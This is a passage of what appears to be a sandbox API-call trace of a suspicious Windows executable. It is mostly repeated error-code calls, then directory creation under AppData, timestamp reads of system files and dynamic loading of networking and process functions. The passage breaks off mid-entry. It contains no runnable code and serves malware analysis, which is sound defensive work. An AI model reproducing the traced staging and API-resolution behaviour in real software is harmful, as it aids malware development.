SetLastError (dwErrCode=0x0) [0033.720] GetLastError () returned 0x0 [0033.720] SetLastError (dwErrCode=0x0) [0033.720] GetLastError () returned 0x0 [0033.720] SetLastError (dwErrCode=0x0) [0033.720] GetLastError () returned 0x0 [0033.720] SetLastError (dwErrCode=0x0) [0033.720] GetLastError () returned 0x0 [0033.720] SetLastError (dwErrCode=0x0) [0033.720] GetLastError () returned 0x0 [0033.720] SetLastError (dwErrCode=0x0) [0033.720] GetLastError () returned 0x0 [0033.720] SetLastError (dwErrCode=0x0) [0033.720] GetLastError () returned 0x0 [0033.720] SetLastError (dwErrCode=0x0) [0033.720] GetLastError () returned 0x0 [0033.720] SetLastError (dwErrCode=0x0) [0033.720] GetLastError () returned 0x0 [0033.720] SetLastError (dwErrCode=0x0) [0033.720] GetLastError () returned 0x0 [0033.720] SetLastError (dwErrCode=0x0) [0033.720] GetLastError () returned 0x0 [0033.720] SetLastError (dwErrCode=0x0) [0033.720] GetLastError () returned 0x0 [0033.720] SetLastError (dwErrCode=0x0) [0033.720] GetLastError () returned 0x0 [0033.721] SetLastError (dwErrCode=0x0) [0033.721] GetLastError () returned 0x0 [0033.721] SetLastError (dwErrCode=0x0) [0033.721] GetLastError () returned 0x0 [0033.721] SetLastError (dwErrCode=0x0) [0033.721] GetLastError () returned 0x0 [0033.721] SetLastError (dwErrCode=0x0) [0033.721] GetLastError () returned 0x0 [0033.721] SetLastError (dwErrCode=0x0) [0033.721] GetLastError () returned 0x0 [0033.721] SetLastError (dwErrCode=0x0) [0033.721] GetLastError () returned 0x0 [0033.721] SetLastError (dwErrCode=0x0) [0033.721] GetLastError () returned 0x0 [0033.721] SetLastError (dwErrCode=0x0) [0033.721] GetLastError () returned 0x0 [0033.721] SetLastError (dwErrCode=0x0) [0033.721] GetLastError () returned 0x0 [0033.721] SetLastError (dwErrCode=0x0) [0033.721] GetLastError () returned 0x0 [0033.721] SetLastError (dwErrCode=0x0) [0033.721] GetLastError () returned 0x0 [0033.721] SetLastError (dwErrCode=0x0) [0033.721] GetLastError () returned 0x0 [0033.721] SetLastError (dwErrCode=0x0) [0033.721] GetLastError () returned 0x0 [0033.721] SetLastError (dwErrCode=0x0) [0033.721] GetLastError () returned 0x0 [0033.721] SetLastError (dwErrCode=0x0) [0033.721] GetLastError () returned 0x0 [0033.721] SetLastError (dwErrCode=0x0) [0033.721] GetLastError () returned 0x0 [0033.721] SetLastError (dwErrCode=0x0) [0033.721] GetLastError () returned 0x0 [0033.722] SetLastError (dwErrCode=0x0) [0033.722] GetLastError () returned 0x0 [0033.722] SetLastError (dwErrCode=0x0) [0033.722] GetLastError () returned 0x0 [0033.722] SetLastError (dwErrCode=0x0) [0033.722] GetLastError () returned 0x0 [0033.722] SetLastError (dwErrCode=0x0) [0033.722] GetLastError () returned 0x0 [0033.722] SetLastError (dwErrCode=0x0) [0033.722] GetLastError () returned 0x0 [0033.722] SetLastError (dwErrCode=0x0) [0033.722] GetLastError () returned 0x0 [0033.722] SetLastError (dwErrCode=0x0) [0033.722] GetLastError () returned 0x0 [0033.722] SetLastError (dwErrCode=0x0) [0033.722] GetLastError () returned 0x0 [0033.722] SetLastError (dwErrCode=0x0) [0033.722] GetLastError () returned 0x0 [0033.722] SetLastError (dwErrCode=0x0) [0033.722] GetLastError () returned 0x0 [0033.722] SetLastError (dwErrCode=0x0) [0033.722] GetLastError () returned 0x0 [0033.722] SetLastError (dwErrCode=0x0) [0033.722] GetLastError () returned 0x0 [0033.722] SetLastError (dwErrCode=0x0) [0033.722] GetLastError () returned 0x0 [0033.722] SetLastError (dwErrCode=0x0) [0033.722] GetLastError () returned 0x0 [0033.722] SetLastError (dwErrCode=0x0) [0033.722] GetLastError () returned 0x0 [0033.722] SetLastError (dwErrCode=0x0) [0033.722] GetLastError () returned 0x0 [0033.722] SetLastError (dwErrCode=0x0) [0033.722] GetLastError () returned 0x0 [0033.723] SetLastError (dwErrCode=0x0) [0033.723] GetLastError () returned 0x0 [0033.723] SetLastError (dwErrCode=0x0) [0033.723] GetLastError () returned 0x0 [0033.723] SetLastError (dwErrCode=0x0) [0033.723] GetLastError () returned 0x0 [0033.723] SetLastError (dwErrCode=0x0) [0033.723] GetLastError () returned 0x0 [0033.723] SetLastError (dwErrCode=0x0) [0033.723] GetLastError () returned 0x0 [0033.723] SetLastError (dwErrCode=0x0) [0033.723] GetLastError () returned 0x0 [0033.723] SetLastError (dwErrCode=0x0) [0033.723] GetLastError () returned 0x0 [0033.723] SetLastError (dwErrCode=0x0) [0033.723] GetLastError () returned 0x0 [0033.723] SetLastError (dwErrCode=0x0) [0033.723] GetLastError () returned 0x0 [0033.723] SetLastError (dwErrCode=0x0) [0033.723] GetLastError () returned 0x0 [0033.723] SetLastError (dwErrCode=0x0) [0033.723] GetLastError () returned 0x0 [0033.723] SetLastError (dwErrCode=0x0) [0033.723] GetLastError () returned 0x0 [0033.723] SetLastError (dwErrCode=0x0) [0033.723] GetLastError () returned 0x0 [0033.723] SetLastError (dwErrCode=0x0) [0033.723] GetLastError () returned 0x0 [0033.723] SetLastError (dwErrCode=0x0) [0033.723] GetLastError () returned 0x0 [0033.723] SetLastError (dwErrCode=0x0) [0033.723] GetLastError () returned 0x0 [0033.723] SetLastError (dwErrCode=0x0) [0033.724] GetLastError () returned 0x0 [0033.724] SetLastError (dwErrCode=0x0) [0033.724] GetLastError () returned 0x0 [0033.724] SetLastError (dwErrCode=0x0) [0033.724] GetLastError () returned 0x0 [0033.724] SetLastError (dwErrCode=0x0) [0033.724] GetLastError () returned 0x0 [0033.724] SetLastError (dwErrCode=0x0) [0033.724] GetLastError () returned 0x0 [0033.724] SetLastError (dwErrCode=0x0) [0033.724] GetLastError () returned 0x0 [0033.724] SetLastError (dwErrCode=0x0) [0033.724] GetLastError () returned 0x0 [0033.724] SetLastError (dwErrCode=0x0) [0033.724] GetLastError () returned 0x0 [0033.724] SetLastError (dwErrCode=0x0) [0033.724] GetLastError () returned 0x0 [0033.724] SetLastError (dwErrCode=0x0) [0033.724] GetLastError () returned 0x0 [0033.724] SetLastError (dwErrCode=0x0) [0033.724] GetLastError () returned 0x0 [0033.724] SetLastError (dwErrCode=0x0) [0033.724] GetLastError () returned 0x0 [0033.724] SetLastError (dwErrCode=0x0) [0033.724] GetLastError () returned 0x0 [0033.724] SetLastError (dwErrCode=0x0) [0033.724] GetLastError () returned 0x0 [0033.724] SetLastError (dwErrCode=0x0) [0033.724] GetLastError () returned 0x0 [0033.724] SetLastError (dwErrCode=0x0) [0033.724] GetLastError () returned 0x0 [0033.724] SetLastError (dwErrCode=0x0) [0033.724] GetLastError () returned 0x0 [0033.724] SetLastError (dwErrCode=0x0) [0033.725] GetLastError () returned 0x0 [0033.725] SetLastError (dwErrCode=0x0) [0033.725] GetLastError () returned 0x0 [0033.725] SetLastError (dwErrCode=0x0) [0033.725] GetLastError () returned 0x0 [0033.725] SetLastError (dwErrCode=0x0) [0033.725] GetLastError () returned 0x0 [0033.725] SetLastError (dwErrCode=0x0) [0033.725] GetLastError () returned 0x0 [0033.725] SetLastError (dwErrCode=0x0) [0033.725] GetLastError () returned 0x0 [0033.725] SetLastError (dwErrCode=0x0) [0033.725] GetLastError () returned 0x0 [0033.725] SetLastError (dwErrCode=0x0) [0033.725] GetLastError () returned 0x0 [0033.725] SetLastError (dwErrCode=0x0) [0033.725] GetLastError () returned 0x0 [0033.725] SetLastError (dwErrCode=0x0) [0033.725] GetLastError () returned 0x0 [0033.725] SetLastError (dwErrCode=0x0) [0033.725] GetLastError () returned 0x0 [0033.725] SetLastError (dwErrCode=0x0) [0033.725] GetLastError () returned 0x0 [0033.725] SetLastError (dwErrCode=0x0) [0033.725] GetLastError () returned 0x0 [0033.725] SetLastError (dwErrCode=0x0) [0033.725] GetLastError () returned 0x0 [0033.725] SetLastError (dwErrCode=0x0) [0033.725] GetLastError () returned 0x0 [0033.725] SetLastError (dwErrCode=0x0) [0033.725] GetLastError () returned 0x0 [0033.725] SetLastError (dwErrCode=0x0) [0033.725] GetLastError () returned 0x0 [0033.725] SetLastError (dwErrCode=0x0) [0033.726] GetLastError () returned 0x0 [0033.726] SetLastError (dwErrCode=0x0) [0033.726] GetLastError () returned 0x0 [0033.726] SetLastError (dwErrCode=0x0) [0033.726] GetLastError () returned 0x0 [0033.726] SetLastError (dwErrCode=0x0) [0033.726] GetLastError () returned 0x0 [0033.726] SetLastError (dwErrCode=0x0) [0033.726] GetLastError () returned 0x0 [0033.726] SetLastError (dwErrCode=0x0) [0033.726] GetLastError () returned 0x0 [0033.726] SetLastError (dwErrCode=0x0) [0033.726] GetLastError () returned 0x0 [0033.726] SetLastError (dwErrCode=0x0) [0033.726] GetLastError () returned 0x0 [0033.726] SetLastError (dwErrCode=0x0) [0033.726] GetLastError () returned 0x0 [0033.726] SetLastError (dwErrCode=0x0) [0033.726] GetLastError () returned 0x0 [0033.726] SetLastError (dwErrCode=0x0) [0033.726] GetLastError () returned 0x0 [0033.726] SetLastError (dwErrCode=0x0) [0033.726] GetLastError () returned 0x0 [0033.726] SetLastError (dwErrCode=0x0) [0033.726] GetLastError () returned 0x0 [0033.726] SetLastError (dwErrCode=0x0) [0033.726] GetLastError () returned 0x0 [0033.726] SetLastError (dwErrCode=0x0) [0033.726] GetLastError () returned 0x0 [0033.726] SetLastError (dwErrCode=0x0) [0033.726] GetLastError () returned 0x0 [0033.726] SetLastError (dwErrCode=0x0) [0033.726] GetLastError () returned 0x0 [0033.726] SetLastError (dwErrCode=0x0) [0033.727] GetLastError () returned 0x0 [0033.727] SetLastError (dwErrCode=0x0) [0033.727] GetLastError () returned 0x0 [0033.727] SetLastError (dwErrCode=0x0) [0033.727] GetLastError () returned 0x0 [0033.727] SetLastError (dwErrCode=0x0) [0033.727] GetLastError () returned 0x0 [0033.727] SetLastError (dwErrCode=0x0) [0033.727] GetLastError () returned 0x0 [0033.727] SetLastError (dwErrCode=0x0) [0033.727] GetLastError () returned 0x0 [0033.727] SetLastError (dwErrCode=0x0) [0033.727] GetLastError () returned 0x0 [0033.727] SetLastError (dwErrCode=0x0) [0033.727] GetLastError () returned 0x0 [0033.727] SetLastError (dwErrCode=0x0) [0033.727] GetLastError () returned 0x0 [0033.727] SetLastError (dwErrCode=0x0) [0033.736] GetLastError () returned 0x0 [0033.736] SetLastError (dwErrCode=0x0) [0033.736] GetLastError () returned 0x0 [0033.736] SetLastError (dwErrCode=0x0) [0033.736] GetLastError () returned 0x0 [0033.736] SetLastError (dwErrCode=0x0) [0033.736] GetLastError () returned 0x0 [0033.736] SetLastError (dwErrCode=0x0) [0033.736] GetLastError () returned 0x0 [0033.736] SetLastError (dwErrCode=0x0) [0033.736] GetLastError () returned 0x0 [0033.736] SetLastError (dwErrCode=0x0) [0033.736] GetLastError () returned 0x0 [0033.736] SetLastError (dwErrCode=0x0) [0033.736] GetLastError () returned 0x0 [0033.736] SetLastError (dwErrCode=0x0) [0033.736] GetLastError () returned 0x0 [0033.736] SetLastError (dwErrCode=0x0) [0033.736] GetLastError () returned 0x0 [0033.737] SetLastError (dwErrCode=0x0) [0033.737] GetLastError () returned 0x0 [0033.737] SetLastError (dwErrCode=0x0) [0033.737] GetLastError () returned 0x0 [0033.737] SetLastError (dwErrCode=0x0) [0033.737] GetLastError () returned 0x0 [0033.737] SetLastError (dwErrCode=0x0) [0033.737] GetLastError () returned 0x0 [0033.737] SetLastError (dwErrCode=0x0) [0033.737] GetLastError () returned 0x0 [0033.737] SetLastError (dwErrCode=0x0) [0033.737] GetLastError () returned 0x0 [0033.737] SetLastError (dwErrCode=0x0) [0033.737] GetLastError () returned 0x0 [0033.737] SetLastError (dwErrCode=0x0) [0033.737] GetLastError () returned 0x0 [0033.737] SetLastError (dwErrCode=0x0) [0033.737] GetLastError () returned 0x0 [0033.737] SetLastError (dwErrCode=0x0) [0033.737] GetLastError () returned 0x0 [0033.737] SetLastError (dwErrCode=0x0) [0033.737] GetLastError () returned 0x0 [0033.737] SetLastError (dwErrCode=0x0) [0033.737] GetLastError () returned 0x0 [0033.737] SetLastError (dwErrCode=0x0) [0033.737] GetLastError () returned 0x0 [0033.738] SetLastError (dwErrCode=0x0) [0033.738] GetLastError () returned 0x0 [0033.738] SetLastError (dwErrCode=0x0) [0033.738] GetLastError () returned 0x0 [0033.738] SetLastError (dwErrCode=0x0) [0033.738] GetLastError () returned 0x0 [0033.738] SetLastError (dwErrCode=0x0) [0033.738] GetLastError () returned 0x0 [0033.738] SetLastError (dwErrCode=0x0) [0033.738] GetLastError () returned 0x0 [0033.738] SetLastError (dwErrCode=0x0) [0033.738] GetLastError () returned 0x0 [0033.738] SetLastError (dwErrCode=0x0) [0033.738] GetLastError () returned 0x0 [0033.738] SetLastError (dwErrCode=0x0) [0033.738] GetLastError () returned 0x0 [0033.738] SetLastError (dwErrCode=0x0) [0033.738] GetLastError () returned 0x0 [0033.738] SetLastError (dwErrCode=0x0) [0033.738] GetLastError () returned 0x0 [0033.738] SetLastError (dwErrCode=0x0) [0033.738] GetLastError () returned 0x0 [0033.738] SetLastError (dwErrCode=0x0) [0033.738] GetLastError () returned 0x0 [0033.738] SetLastError (dwErrCode=0x0) [0033.738] GetLastError () returned 0x0 [0033.738] SetLastError (dwErrCode=0x0) [0033.738] GetLastError () returned 0x0 [0033.738] SetLastError (dwErrCode=0x0) [0033.738] GetLastError () returned 0x0 [0033.738] SetLastError (dwErrCode=0x0) [0033.738] GetLastError () returned 0x0 [0033.739] SetLastError (dwErrCode=0x0) [0033.739] GetLastError () returned 0x0 [0033.739] SetLastError (dwErrCode=0x0) [0033.739] GetLastError () returned 0x0 [0033.739] SetLastError (dwErrCode=0x0) [0033.739] GetLastError () returned 0x0 [0033.739] SetLastError (dwErrCode=0x0) [0033.739] GetLastError () returned 0x0 [0033.739] SetLastError (dwErrCode=0x0) [0033.739] GetLastError () returned 0x0 [0033.739] SetLastError (dwErrCode=0x0) [0033.739] GetLastError () returned 0x0 [0033.739] SetLastError (dwErrCode=0x0) [0033.739] GetLastError () returned 0x0 [0033.739] SetLastError (dwErrCode=0x0) [0033.739] GetLastError () returned 0x0 [0033.739] SetLastError (dwErrCode=0x0) [0033.739] GetLastError () returned 0x0 [0033.739] SetLastError (dwErrCode=0x0) [0033.739] GetLastError () returned 0x0 [0033.739] SetLastError (dwErrCode=0x0) [0033.739] GetLastError () returned 0x0 [0033.739] SetLastError (dwErrCode=0x0) [0033.739] GetLastError () returned 0x0 [0033.739] SetLastError (dwErrCode=0x0) [0033.739] GetLastError () returned 0x0 [0033.739] SetLastError (dwErrCode=0x0) [0033.739] GetLastError () returned 0x0 [0033.739] SetLastError (dwErrCode=0x0) [0033.739] GetLastError () returned 0x0 [0033.740] SetLastError (dwErrCode=0x0) [0033.740] GetLastError () returned 0x0 [0033.740] SetLastError (dwErrCode=0x0) [0033.740] GetLastError () returned 0x0 [0033.740] SetLastError (dwErrCode=0x0) [0033.740] GetLastError () returned 0x0 [0033.740] SetLastError (dwErrCode=0x0) [0033.740] GetLastError () returned 0x0 [0033.740] SetLastError (dwErrCode=0x0) [0033.740] GetLastError () returned 0x0 [0033.740] SetLastError (dwErrCode=0x0) [0033.740] GetLastError () returned 0x0 [0033.740] SetLastError (dwErrCode=0x0) [0033.740] GetLastError () returned 0x0 [0033.740] SetLastError (dwErrCode=0x0) [0033.740] GetLastError () returned 0x0 [0033.740] SetLastError (dwErrCode=0x0) [0033.740] GetLastError () returned 0x0 [0033.740] SetLastError (dwErrCode=0x0) [0033.740] GetLastError () returned 0x0 [0033.740] SetLastError (dwErrCode=0x0) [0033.740] GetLastError () returned 0x0 [0033.740] SetLastError (dwErrCode=0x0) [0033.740] GetLastError () returned 0x0 [0033.740] SetLastError (dwErrCode=0x0) [0033.740] GetLastError () returned 0x0 [0033.740] SetLastError (dwErrCode=0x0) [0033.740] GetLastError () returned 0x0 [0033.740] SetLastError (dwErrCode=0x0) [0033.740] GetLastError () returned 0x0 [0033.740] SetLastError (dwErrCode=0x0) [0033.740] GetLastError () returned 0x0 [0033.741] SetLastError (dwErrCode=0x0) [0033.741] GetLastError () returned 0x0 [0033.741] SetLastError (dwErrCode=0x0) [0033.741] GetLastError () returned 0x0 [0033.741] SetLastError (dwErrCode=0x0) [0033.741] GetLastError () returned 0x0 [0033.741] SetLastError (dwErrCode=0x0) [0033.741] GetLastError () returned 0x0 [0033.741] SetLastError (dwErrCode=0x0) [0033.741] GetLastError () returned 0x0 [0033.741] SetLastError (dwErrCode=0x0) [0033.741] GetLastError () returned 0x0 [0033.741] SetLastError (dwErrCode=0x0) [0033.741] GetLastError () returned 0x0 [0033.741] SetLastError (dwErrCode=0x0) [0033.741] GetLastError () returned 0x0 [0033.741] SetLastError (dwErrCode=0x0) [0033.741] GetLastError () returned 0x0 [0033.741] SetLastError (dwErrCode=0x0) [0033.741] GetLastError () returned 0x0 [0033.741] SetLastError (dwErrCode=0x0) [0033.741] GetLastError () returned 0x0 [0033.741] SetLastError (dwErrCode=0x0) [0033.741] GetLastError () returned 0x0 [0033.741] SetLastError (dwErrCode=0x0) [0033.741] GetLastError () returned 0x0 [0033.741] SetLastError (dwErrCode=0x0) [0033.741] GetLastError () returned 0x0 [0033.741] SetLastError (dwErrCode=0x0) [0033.741] GetLastError () returned 0x0 [0033.741] SetLastError (dwErrCode=0x0) [0033.741] GetLastError () returned 0x0 [0033.741] SetLastError (dwErrCode=0x0) [0033.741] GetLastError () returned 0x0 [0033.742] SetLastError (dwErrCode=0x0) [0033.742] GetLastError () returned 0x0 [0033.742] SetLastError (dwErrCode=0x0) [0033.742] GetLastError () returned 0x0 [0033.742] SetLastError (dwErrCode=0x0) [0033.742] GetLastError () returned 0x0 [0033.742] SetLastError (dwErrCode=0x0) [0033.742] GetLastError () returned 0x0 [0033.742] SetLastError (dwErrCode=0x0) [0033.742] GetLastError () returned 0x0 [0033.742] SetLastError (dwErrCode=0x0) [0033.742] GetLastError () returned 0x0 [0033.742] SetLastError (dwErrCode=0x0) [0033.742] GetLastError () returned 0x0 [0033.742] SetLastError (dwErrCode=0x0) [0033.742] GetLastError () returned 0x0 [0033.742] SetLastError (dwErrCode=0x0) [0033.742] GetLastError () returned 0x0 [0033.742] SetLastError (dwErrCode=0x0) [0033.742] GetLastError () returned 0x0 [0033.742] SetLastError (dwErrCode=0x0) [0033.742] GetLastError () returned 0x0 [0033.742] SetLastError (dwErrCode=0x0) [0033.742] GetLastError () returned 0x0 [0033.742] SetLastError (dwErrCode=0x0) [0033.742] GetLastError () returned 0x0 [0033.742] SetLastError (dwErrCode=0x0) [0033.742] GetLastError () returned 0x0 [0033.743] SetLastError (dwErrCode=0x0) [0033.743] GetLastError () returned 0x0 [0033.743] SetLastError (dwErrCode=0x0) [0033.743] GetLastError () returned 0x0 [0033.743] SetLastError (dwErrCode=0x0) [0033.743] GetLastError () returned 0x0 [0033.743] SetLastError (dwErrCode=0x0) [0033.743] GetLastError () returned 0x0 [0033.743] SetLastError (dwErrCode=0x0) [0033.743] GetLastError () returned 0x0 [0033.743] SetLastError (dwErrCode=0x0) [0033.743] GetLastError () returned 0x0 [0033.743] SetLastError (dwErrCode=0x0) [0033.743] GetLastError () returned 0x0 [0033.743] SetLastError (dwErrCode=0x0) [0033.743] GetLastError () returned 0x0 [0033.743] SetLastError (dwErrCode=0x0) [0033.743] GetLastError () returned 0x0 [0033.743] SetLastError (dwErrCode=0x0) [0033.743] GetLastError () returned 0x0 [0033.743] SetLastError (dwErrCode=0x0) [0033.743] GetLastError () returned 0x0 [0033.743] SetLastError (dwErrCode=0x0) [0033.744] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0033.744] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0033.744] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0033.744] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf400 | out: lpSystemTimeAsFileTime=0x2cf400*(dwLowDateTime=0xe1cd4690, dwHighDateTime=0x1d3dfba)) [0033.745] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2cf338, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.745] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2cf220, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.745] GetLastError () returned 0x0 [0033.745] GetLastError () returned 0x0 [0033.745] GetLastError () returned 0x0 [0033.745] GetLastError () returned 0x0 [0033.745] GetLastError () returned 0x0 [0033.745] GetLastError () returned 0x0 [0033.745] GetLastError () returned 0x0 [0033.745] GetLastError () returned 0x0 [0033.745] GetLastError () returned 0x0 [0033.745] GetLastError () returned 0x0 [0033.745] GetLastError () returned 0x0 [0033.745] GetLastError () returned 0x0 [0033.745] GetLastError () returned 0x0 [0033.745] GetLastError () returned 0x0 [0033.745] GetLastError () returned 0x0 [0033.745] GetLastError () returned 0x0 [0033.745] GetLastError () returned 0x0 [0033.745] GetLastError () returned 0x0 [0033.745] GetLastError () returned 0x0 [0033.745] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0033.745] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0033.745] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.745] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.745] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.745] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0033.745] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0033.746] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0033.746] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0033.746] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0033.746] GetLastError () returned 0xb7 [0033.746] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0033.746] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0033.746] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0033.746] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0033.746] wsprintfA (in: param_1=0x2cf0a0, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0033.746] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0033.746] wsprintfA (in: param_1=0x2cef9c, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0033.746] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0033.746] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0033.746] CloseHandle (hObject=0x74) returned 1 [0033.746] GetLastError () returned 0x0 [0033.746] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0033.746] GetLastError () returned 0x0 [0033.746] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0033.747] GetSystemDirectoryA (in: lpBuffer=0x2cf0a0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0033.747] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0033.747] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0033.747] CloseHandle (hObject=0x74) returned 1 [0033.747] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0033.747] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0033.747] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0033.748] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0033.748] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0033.748] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0033.748] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0033.748] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0033.749] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0033.749] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0033.749] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0033.749] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0033.749] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0033.749] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0033.749] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0033.749] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0033.749] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0033.749] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0033.749] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0033.749] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0033.749] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0033.749] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0033.749] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0033.749] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0033.749] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0033.749] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0033.749] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0033.749] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0033.750] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0033.750] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0033.750] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0033.750] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0033.750] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 